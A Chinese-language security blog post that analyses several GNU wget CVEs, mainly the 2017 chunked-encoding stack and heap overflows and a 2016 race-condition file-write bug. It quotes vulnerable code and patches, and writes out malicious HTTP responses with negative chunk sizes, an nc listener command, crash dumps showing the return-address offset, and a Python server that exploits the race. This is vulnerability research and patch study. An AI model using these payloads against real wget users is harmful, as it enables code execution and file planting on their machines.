Wget漏洞的梳理

Jan 1, 2019

Wget漏洞的梳理

没有大把的实现进行程序开发，积累了不少想法。闲暇时间在研究Angr和Qiling两个框架，后者我觉得解决了很多通点，原本构想的一些关于插桩的改进点都被这个框架解决了，很棒很优秀的框架。不过其本身只是一个框架，可以考虑基于框架开发一个更有针对性的分析工具（比如病毒），使之更易用。

找了比较感兴趣的Linux上的小工具，梳理其漏洞。

CVE-2019-5953 Remote Buffer Overflow Vuln

漏洞描述

Buffer Overflow类型的漏洞，影响范围波及至1.20之前的版本，日本方面的Kusano Kazuhiko发现的漏洞。1.20.2内并没有真正修复，1.20.3版本修复该漏洞。不过发现者不仅没放POC，且对于该漏洞的描述少之又少，邮件列表里就有人吐槽过了（虽然验证是成功的）。

漏洞分析

这个漏洞是在src/iri.c文件内的do_conversion()，用于处理转utf的函数。这个函数取决于目标机是否有iconv，HAVE_ICONV为真的话就会正常编译该功能。

/* Do the conversion according to the passed conversion descriptor cd. *out
   will contain the transcoded string on success. *out content is
   unspecified otherwise. */
static bool
do_conversion (const char *tocode, const char *fromcode, char const *in_org, size_t inlen, char **out)
{
  iconv_t cd;
  /* sXXXav : hummm hard to guess... */
  size_t len, done, outlen;
  int invalid = 0, tooshort = 0;
  char *s, *in, *in_save;

  cd = iconv_open (tocode, fromcode);
  if (cd == (iconv_t)(-1))
    {
      logprintf (LOG_VERBOSE, _("Conversion from %s to %s isn't supported\n"),
                 quote (fromcode), quote (tocode));
      *out = NULL;
      return false;
    }

  /* iconv() has to work on an unescaped string */
  in_save = in = xstrndup (in_org, inlen);
  url_unescape_except_reserved (in);
  inlen = strlen(in);

  len = outlen = inlen * 2;
  *out = s = xmalloc (outlen + 1);
  done = 0;

  for (;;)
    {
      if (iconv (cd, (ICONV_CONST char **) &in, &inlen, out, &outlen) != (size_t)(-1) &&
          iconv (cd, NULL, NULL, out, &outlen) != (size_t)(-1))
        {
          *out = s;
          *(s + len - outlen - done) = '\0';
          xfree(in_save);
          iconv_close(cd);
          IF_DEBUG
          {
            /* not not print out embedded passwords, in_org might be an URL */
            if (!strchr(in_org, '@') && !strchr(*out, '@'))
              debug_logprintf ("converted '%s' (%s) -> '%s' (%s)\n", in_org, fromcode, *out, tocode);
            else
              debug_logprintf ("logging suppressed, strings may contain password\n");
          }
          return true;
        }

      /* Incomplete or invalid multibyte sequence */
      if (errno == EINVAL || errno == EILSEQ)
        {
          if (!invalid)
            logprintf (LOG_VERBOSE,
                      _("Incomplete or invalid multibyte sequence encountered\n"));

          invalid++;
          **out = *in;
          in++;
          inlen--;
          (*out)++;
          outlen--;
        }
      else if (errno == E2BIG) /* Output buffer full */
        {
          /// Here Comes the Vuln
          tooshort++;
          done = len;
          len = outlen = done + inlen * 2;
          s = xrealloc (s, outlen + 1);
          *out = s + done;
        }
      else /* Weird, we got an unspecified error */
        {
          logprintf (LOG_VERBOSE, _("Unhandled errno %d\n"), errno);
          break;
        }
    }
    /// Other works ... Skip
    return false;
}

iconv的原型如下，主要功能是根据convert descriptor（cd）将inbuf里的内容转换为另一编码，放置于outbuf中。buf后的byte size都是关于buffer中现有的字节数量，控制最多会读入多少，以及最多写入多少，在转换过程中size的值会变化，*inbuf也会变化。

size_t iconv(iconv_t cd,
             char **inbuf, size_t *inbytesleft,
             char **outbuf, size_t *outbytesleft);

man中描述了convert可能的终止条件，略去成功的主要是3个：

非法的Byte Sequence，这个好理解，设置的是EILSEQ errno
不完整的Byte Sequence，比如inbuf里本该都是8字节的sequence，最后只有6字节就结束了。会设置EINVAL，*inbuf会停在此sequence开头。
output buffer不足，设置E2BIG，此外如果inputbuff是NULL而output不为NULL，iconv会在output里放shifting code，如果output太小也会设置该值。

本漏洞出现在E2BIG的情况。out指向的是malloc分配的一块堆内存（在此处作为中间变量s存在），len记录了存放于该内存的字节数量，outlen指示output中可存放字节的数目，在iconv处理时会在内部递减。

      else if (errno == E2BIG) /* Output buffer full */
        {
          /// Here Comes the Vuln
          tooshort++;
          done = len;
          len = outlen = done + inlen * 2;
          s = xrealloc (s, outlen + 1);
          *out = s + done;
        }

触发脚本（失败）

do_conversion整个的调用链大致如下（1.20.1版本）：

url_parse
=> remote_to_utf8 (iri, iri->orig_url ? iri->orig_url : url, &new_url);
=> if (do_conversion (“UTF-8”, iri->uri_encoding, str, strlen (str), new))

编译一下1.20.1的版本，需要编译为支持iri，由于我的测试机configure时unistring一直找不到，直接用centos预编译的wget14版本。

mkdir /home/sample
cd /home/sample
wget https://ftp.gnu.org/gnu/wget/wget-1.20.1.tar.gz
tar -zxvf wget-1.20.1.tar.gz
cd wget-1.20.1
./configure
make

gdb调试wget，在do_conversion处下断点，用如下命令可以触发至该处

gdb wget
(gdb)$ r --remote-encoding=UTF-8 --local-encoding=UTF-16 --recursive https://ftp.gnu.org/gnu/Licenses/

E2BIG的值对应的是7,故断在cmp 7, eax的位置，在我的版本上是do_conversion+208的偏移处。但无法找到合适的url触发至该点。这个漏洞从代码分析来看会造成堆上数据之间存在未初始化过的数据（一个个空洞），不过不知道如何进行利用。发邮件询问仍无消息。

   0x0000000000430000 <+208>:   cmp    $0x7,%ecx
   0x0000000000430003 <+211>:   jne    0x4300c0 <do_conversion+400>
   0x0000000000430009 <+217>:   mov    0x10(%rsp),%rax
   0x000000000043000e <+222>:   lea    0x0(%rbp,%rax,2),%rdi
   0x0000000000430013 <+227>:   mov    %rdi,0x20(%rsp)
   0x0000000000430018 <+232>:   add    $0x1,%rdi
   0x000000000043001c <+236>:   callq  0x436ce0 <xmalloc>
   0x0000000000430021 <+241>:   mov    %rbp,%rdx
   0x0000000000430024 <+244>:   mov    %r12,%rsi
   0x0000000000430027 <+247>:   mov    %rax,%rdi
   0x000000000043002a <+250>:   mov    %rax,%r15
   0x000000000043002d <+253>:   callq  0x4046f0 <memcpy@plt>
   0x0000000000430032 <+258>:   mov    %r12,%rdi
   0x0000000000430035 <+261>:   mov    %r15,%r12
   0x0000000000430038 <+264>:   callq  0x404a50 <free@plt>
   0x000000000043003d <+269>:   lea    (%r15,%rbp,1),%rax
   0x0000000000430041 <+273>:   mov    %rbp,%r15
   0x0000000000430044 <+276>:   mov    0x20(%rsp),%rbp
   0x0000000000430049 <+281>:   mov    %rax,(%rbx)
   0x000000000043004c <+284>:   jmpq   0x42ff88 <do_conversion+88>

Ref

CVE-2017-13089 Stack Buffer Overflow Vulnerability

Introduction

影响范围至1.19.1之前，在10年的Support HTTP/1.1.Commit中引入该Bug。漏洞存在于http.c的skip_short_body函数里，该函数用于处理诸如重定向等工作。网上的关于这个漏洞的介绍还蛮多，和后面的13090是同时爆出的同类型漏洞。

分析

Http中的Response如果以分片的形式发送会调用strtol()对检查分片大小，后面会用MIN（x， 512）这样选取最终的分片大小。但是在调用strtol时没有检查返回值是否为负数（一个long int），若该值为负数，则MIN宏判断x小于512，最终将分片大小值x传递给connect.c中的fd_read()，存在long int到int的类型转换，x的低4字节被作为fd_read()的长度参数。我们便可以控制fd_read的数据写入长度，以及写入的数据。

主要部分的代码块如下, 首先满足statcode需要是HTTP_STATUS_UNAUTHORIZED即401, warc_enabled 由–warc-file=参数决定，在这里不需要指定。content_len来自于Content-Length字段指定，在前面解析出来了，需要其小于SKIP_THRESHOLD（4096）。chunked_transfer_encoding 默认为false，来自与header里的Transfer-Encoding字段。需要chunked为True，满足三个条件可以进入strtol的位置。

  if (statcode == HTTP_STATUS_UNAUTHORIZED)
    {
      /* Authorization is required.  */
      uerr_t auth_err = RETROK;
      bool retry;
      /* Normally we are not interested in the response body.
         But if we are writing a WARC file we are: we like to keep everyting.  */
      // >>>>>>> warc_enabled <<<<<<<<<<
      //   bool warc_enabled = (opt.warc_filename != NULL);
      if (warc_enabled)
        {
          int _err;
          type = resp_header_strdup (resp, "Content-Type");
          _err = read_response_body (hs, sock, NULL, contlen, 0,
                                    chunked_transfer_encoding,
                                    u->url, warc_timestamp_str,
                                    warc_request_uuid, warc_ip, type,
                                    statcode, head);
          xfree (type);

          if (_err != RETRFINISHED || hs->res < 0)
            {
              CLOSE_INVALIDATE (sock);
              retval = _err;
              goto cleanup;
            }
          else
            CLOSE_FINISH (sock);
        }
      else
        {
          /* Since WARC is disabled, we are not interested in the response body.  */
          if (keep_alive && !head_only
              && skip_short_body (sock, contlen, chunked_transfer_encoding))
            CLOSE_FINISH (sock);
          else
            CLOSE_INVALIDATE (sock);
        }
/// Other Works...
  }

根据代码的处理逻辑，contentlen>0和chunked二者有一满足即可。加之HTTP Response无在法明确指定Content-Length字段时可以用Transfer-Encoding: chunked进行分片，此时会忽略Content-Length。综合以上，reponse包需具备下面的条件

HTTP/1.1 401 Not Authorized
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding： chunked
Connection: keep-alive

// data

每个chunk的Data部分构成如下，最后一个chunk长度段为0，代表结尾。

长度	`\r\n`{=tex}	数据	`\r\n`{=tex}
Hex	换行	Hex	换行

完整构造的包如下，fd_read写入的目标Buffer大小为512字节，数据量要超过512字节，这里先生成长为1024B的pattern。

HTTP/1.1 401 Not Authorized
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

-0xFFFF0400
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B

0

1.19.2的Patch很简单，在后面补了个长度判断。

               remaining_chunk_size = strtol (line, &endl, 16);
               xfree (line);
 
+              if (remaining_chunk_size < 0)
+                return false;
+
               if (remaining_chunk_size == 0)
                 {
                   line = fd_read_line (fd);

PoC

PoC参考了github上的Poc以及博客中的内容（地址归在Ref节中）。

触发漏洞需要的调用栈如下，依照前面构造的包进行Response

gethttp -> CASE : HTTP_STATUS_UNAUTHORIZED
=> skip_short_body (sock, contlen, chunked_transfer_encoding)
=> connect.c : fd_read (fd, buf, bufsize, timeout)

编译1.19.1版本wget，make之后的二进制文件在src里面。

# option -- 考虑测试exploit的话，configure.ac带上CFLAGS="-fno-stack-protector $CFLAGS"编译
# 关掉NX保护CFLAGS="-z execstack $CFLAGS"

cd /home/sample
wget https://ftp.gnu.org/gnu/wget/wget-1.19.1.tar.gz
tar -zxvf wget-1.19.1.tar.gz
cd wget-1.19.1
./configure --prefix=/home/sample/usr --sysconfdir=/home/sample/etc --docdir=/home/sample/doc/wget --with-ssl=openssl
make

创建vuln_response，内容为我们构造的数据包，nc启动监听模拟收包行为，由于编译时没有加入debug info，在源码中相应位置加入了打印语句

# shell 1st
nc -lp 2333 < vuln_response

# shell 2nd
[root@centos ]# ./wget 127.0.0.1:2333
Connecting to 127.0.0.1:2333... connected.
HTTP request sent, awaiting response... 401 Not Authorized
[Mod]: Chunked Size : -4294902784
[Mod]: Before Read the contlen is 64512
0x7fff9f420350: 41 61 30 41   61 31 41 61   Aa0A a1Aa
0x7fff9f420358: 32 41 61 33   41 61 34 41   2Aa3 Aa4A
0x7fff9f420360: 61 35 41 61   36 41 61 37   a5Aa 6Aa7
0x7fff9f420368: 41 61 38 41   61 39 41 62   Aa8A a9Ab
0x7fff9f420370: 30 41 62 31   41 62 32 41   0Ab1 Ab2A
....
[Mod]: Now the contlen is 512
[Mod]: Before Read the contlen is 512
0x7fff9f420350: 41 61 30 41   61 31 41 61   Aa0A a1Aa
0x7fff9f420358: 32 41 61 33   41 61 34 41   2Aa3 Aa4A
0x7fff9f420360: 61 35 41 61   36 41 61 37   a5Aa 6Aa7
0x7fff9f420368: 41 61 38 41   61 39 41 62   Aa8A a9Ab
0x7fff9f420370: 30 41 62 31   41 62 32 41   0Ab1 Ab2A
....

Segmentation fault (core dumped)

产生segment fault，打开gdb调试一下，此时已经完成rbp的恢复，则此时rsp指向位置即为retn地址，本机上偏移地址为616，后续工作集中于绕过安全机制，劫持控制流。

cd /tmp/cores
gdb core-xxx
(gdb)$ file  /home/sample/wget-1.19.1/src/wget
(gdb)$ info reg
rax            0x0      0
rbx            0x3174413074413973       3563544881521572211
rcx            0x35     53
rdx            0x0      0
rsi            0x0      0
rdi            0x7fff9f41fd90   140735865290128
rbp            0x4134754133754132       0x4134754133754132
rsp            0x7fff9f4205b8   0x7fff9f4205b8
rip            0x41fb7e 0x41fb7e <skip_short_body+1175>
(gdb) x /s $rsp
0x7fff9f4205b8: "u5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1"...

思考一下攻击场景，构造一个看似正常的下载网址，但是永远返回这个response。或者是一个下载网站，其中大量的正常文件，但是隐藏一个返回该包的链接，wget recusive下载的时候中招。

Ref

1. Security Focus Report

6. github exploit example

7. Chunked Size

8. online Pattern gen

CVE-2017-13090 Heap Buffer Overflow Vulnerability

Introduction

和上面的13089同类型漏洞，漏洞存在于retr.c:fd_read_body()中，未检查strtol的返回值为负数的情况。

漏洞分析

漏洞触发代码如下，exact来自于rb_read_exactly选项，需要其为False（不指定），sum_read代表目前读取的字符，和toread一起控制循环，其余的同13089类似，只是本次的dlbuf是通过xmalloc（dlbufsize）进行分配，dlbufsize来自于max(BUFSIZ, 8 * 1024)。

int
fd_read_body (const char *downloaded_filename, int fd, FILE *out, wgint toread, wgint startpos,

              wgint *qtyread, wgint *qtywritten, double *elapsed, int flags,
              FILE *out2)
{
    /// Other Works ...
  while (!exact || (sum_read < toread))
    {
      int rdsize;
      double tmout = opt.read_timeout;

      if (chunked)
        {
          if (remaining_chunk_size == 0)
            {
              char *line = fd_read_line (fd);
              char *endl;
              if (line == NULL)
                {
                  ret = -1;
                  break;
                }
              else if (out2 != NULL)
                fwrite (line, 1, strlen (line), out2);

              remaining_chunk_size = strtol (line, &endl, 16);
              xfree (line);

              if (remaining_chunk_size == 0)
                {
                  ret = 0;
                  line = fd_read_line (fd);
                  if (line == NULL)
                    ret = -1;
                  else
                    {
                      if (out2 != NULL)
                        fwrite (line, 1, strlen (line), out2);
                      xfree (line);
                    }
                  break;
                }
            }

          rdsize = MIN (remaining_chunk_size, dlbufsize);
        }
      else
        rdsize = exact ? MIN (toread - sum_read, dlbufsize) : dlbufsize;

      /// Other WOrks ...
      
      ret = fd_read (fd, dlbuf, rdsize, tmout);

      /// Other Works ...
  return ret;
}

在http.c里找到一个调用fd_read_body()的位置，其在read_response_body中。

static int
read_response_body (struct http_stat *hs, int sock, FILE *fp, wgint contlen,
                    wgint contrange, bool chunked_transfer_encoding,
                    char *url, char *warc_timestamp_str, char *warc_request_uuid,
                    ip_address *warc_ip, char *type, int statcode, char *head)
{
    /// Other Works ...
  /* Download the response body and write it to fp.
     If we are working on a WARC file, we simultaneously write the
     response body to warc_tmp.  */
  hs->res = fd_read_body (hs->local_file, sock, fp, contlen != -1 ? contlen : 0,
                          hs->restval, &hs->rd_size, &hs->len, &hs->dltime,
                          flags, warc_tmp);
    
    /// Other Works
}

若要触发至此处，仍需使用chunk字段，HTTP_STATUS_UNAUTHORIZED且需要enable warc。另一个触发方法是gethttp中返回值为OK时，触发到read_response_body。

PoC

先把源码打上CVE-2017-13089的Patch，修复前面的漏洞，在http.c的short_body处补上检查，我还修改了retr.c里打印一下bufsize。

index 55367688..dc318231 100644
--- a/src/http.c
+++ b/src/http.c
@@ -973,6 +973,9 @@ skip_short_body (int fd, wgint contlen, bool chunked)
               remaining_chunk_size = strtol (line, &endl, 16);
               xfree (line);
 
+              if (remaining_chunk_size < 0)
+                return false;
+
               if (remaining_chunk_size == 0)
                 {
                   line = fd_read_line (fd);

重新编译

rm src/http.o src/retr.o
make

构造了一个返回状态为200OK的数据包，测试到的Buff size为8192，生成了一个10000长度的pattern，底下为了页面截断了。

HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

-0xFFFF2710
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5......

0

如前一个漏洞，对其进行测试，产生segment fault

Connecting to 127.0.0.1:2333... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘index.html.2’
alloc Buff size 8192

index.html.2               [<=>                          ]       0  --.-KB/s               Segmentation fault (core dumped)

查看寄存器和汇编码，停在如下位置，目前的返回地址为616偏移处，意味着依旧可以劫持控制流。

   0x000000000041fb74 <+1165>:  callq  0x42ab4c <debug_logprintf>
   0x000000000041fb79 <+1170>:  mov    $0x1,%eax
=> 0x000000000041fb7e <+1175>:  add    $0x2c8,%rsp

rax            0x0      0
rbx            0x3174413074413973       3563544881521572211
rcx            0x35     53
rdx            0x0      0
rsi            0x0      0
rdi            0x7fff9f41fd90   140735865290128
rbp            0x4134754133754132       0x4134754133754132
rsp            0x7fff9f4205b8   0x7fff9f4205b8
r8             0x0      0
r9             0x7f55b7b6714d   140006131134797
r10            0x69     105
r11            0x246    582
r12            0x7441337441327441       8377033356288881729
r13            0x4136744135744134       4699071084626198836
r14            0x3974413874413774       4140005668184733556
r15            0x7541317541307541       8449088755598390593
rip            0x41fb7e 0x41fb7e <skip_short_body+1175>
eflags         0x10206  [ PF IF RF ]

Ref

1. Security Focus report

2. RedHat Report

3. Fix Patch

CVE 2014-4877

已有详尽的分析，比较古老的漏洞，影响范围至1.16-1.13版本。可以用metasploti的相应模块进行攻击利用。

1. 分析

2. Metasploit Code

3. report

CVE CVE-2016-7098

一个偏向条件竞争引起的文件写入漏洞。漏洞发现者在mailing list中附上了POC，其中有详细的漏洞介绍。运用条件可能比较苛刻，结合其他攻击手段才有威胁。其中mailing list对于wget的temp file引入漏洞做了比较详细的讨论，很值得一读。影响1.18之下的版本

分析和复现

hack的地方主要是recursive那里，使用recursive进行文件获取时，可以用--acclist A.txt;B.txt;*.jpg这种方式选择接受的文件和拒绝的文件。

"Recursive Accept/Reject Options:
  -A acclist --accept acclist
  -R rejlist --reject rejlist

Specify comma-separated lists of file name suffixes or patterns to accept or 
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in 
an element of acclist or rejlist, it will be treated as a pattern, rather 
than a suffix."

但是若在此情况下服务器上仅请求一个文件，wget只会在download进程结束时进行accept的检查，在文件下载完成到下载进程结束有一段空窗期，举个例子，想下载并查看attack-server上的一些图片，cd到某个目录下，使用

wget -r -nH -A '*.jpg' http://attackers-server/vacation.php

攻击者可把持者http连接，使之暂时不中断，在这段营造出来的时间里该php文件是存在的。（之后由于不再accept里会被wget删除）

在攻击机上布置如下代码

# encoding: utf-8

import http.server as SimpleHTTPServer
import time
import socketserver as SocketServer

# IP = '127.0.0.1'
IP = '0.0.0.0'
PORT = 80

class wget_exp(SimpleHTTPServer.BaseHTTPRequestHandler):
    def do_GET(self):
        print("recv wget request: " + self.path)
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(bytes("U r in the /tmp path, and open this right? :)", encoding="utf-8"))

        time.sleep(5)

        print("Dead")
        return

handler = SocketServer.TCPServer((IP, PORT), wget_exp)
handler.serve_forever()

在特定目录下"意外"使用了wget命令（漏洞报告者构想的场景是以web账户在web目录下运行了相应的命令，比如创建的是一个php文件，导致这段时间内攻击者可以连接到phpshell中），可以看到这段时间中secret.py存在了一段时间（5s），可以通过修改代码的sleep增大时间。

>>>>>>>>>>>>>>>> Victim tmp/tmpintmp/ path <<<<<<<<<<<<<<<<<<<
[user] ls -la
total 12
drwxr-xr-x   2 root root 4096  .
drwxrwxrwt. 11 root root 4096  ..
-rw-r--r--   1 root root   45  secret.py

[user] ls -la
total 8
drwxr-xr-x   2 root root 4096  .
drwxrwxrwt. 11 root root 4096  ..

>>>>>>>>>>>>>>>> Victim Wget Console <<<<<<<<<<<<<<<<<<<<<
wget -r -nH -A '*.jpg' http://127.0.0.1/secret.py
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘secret.py’

    [      <=>                                                                                                                                          ] 45          --.-K/s   in 4.8s    

[time] (9.47 B/s) - ‘secret.py’ saved [45]

Removing secret.py since it should be rejected.

FINISHED [time]--
Total wall clock time: 5.0s
Downloaded: 1 files, 45 in 4.8s (9.47 B/s)

在http.c里进行了对生成的临时文件做了权限上的限制，修正至rw

@@ -39,6 +39,7 @@ as that of the covered work.  */
 #include <errno.h>
 #include <time.h>
 #include <locale.h>
+#include <fcntl.h>
 
 #include "hash.h"
 #include "http.h"
@@ -2471,7 +2472,17 @@ open_output_stream (struct http_stat *hs, int count, FILE **fp)
           open_id = 22;
           *fp = fopen (hs->local_file, "wb", FOPEN_OPT_ARGS);
 #else /* def __VMS */
-          *fp = fopen (hs->local_file, "wb");
+          if (opt.delete_after
+            || opt.spider /* opt.recursive is implicitely true */
+            || !acceptable (hs->local_file))
+            {
+              *fp = fdopen (open (hs->local_file, O_BINARY | O_CREAT | O_TRUNC | O_WRONLY, S_IRUSR | S_IWUSR), "wb");
+            }
+          else
+            {
+              *fp = fopen (hs->local_file, "wb");
+            }
+
 #endif /* def __VMS [else] */
         }
       else

后面一个commit,由于担心CVE被利用，又补上了下面的部分，在临时文件后面使用.tmp后缀进行标识，应该是为了防止现有系统上的文件被覆盖（在Ref部分的discussion中讨论了关于man文档中recusive部分描述和警告不足的部分，容易引起用户的误解）。

+  hs->temporary = opt.delete_after || opt.spider || !acceptable (hs->local_file);
+  if (hs->temporary)
+    {
+      char *tmp = NULL;
+      asprintf (&tmp, "%s.tmp", hs->local_file);
+      xfree (hs->local_file);
+      hs->local_file = tmp;
+    }
+

不过这个patch感觉依旧不是很完美，限制了rw权限，对于脚本来说在一些情况下仍然可能被程序调用执行。而重命名至tmp后缀则是一个比较弱的过滤选项，根源还是在创建临时文件这里，wget的维护者讨论过这些，取消temp file并重构代码留待wget2完成。

ref

1. report

2. exploit db

3. Mailing list

4. discussion about the design and more potential risks revealed by this CVE（and possible improvements）

一些体会

wget的漏洞数量都比较少，漏洞大致归于如下

数值变量溢出
Temp file带来的一些问题（如文件系统任意写）
recursive模式引入的一些问题